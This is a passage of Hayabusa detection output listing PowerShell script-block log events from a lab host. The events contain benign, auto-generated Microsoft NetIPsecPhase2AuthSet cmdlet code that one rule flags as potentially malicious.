(@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase2AuthSet' -Alias '*' function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { 
[object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 
'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase2AuthSet' -Alias '*' function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( 
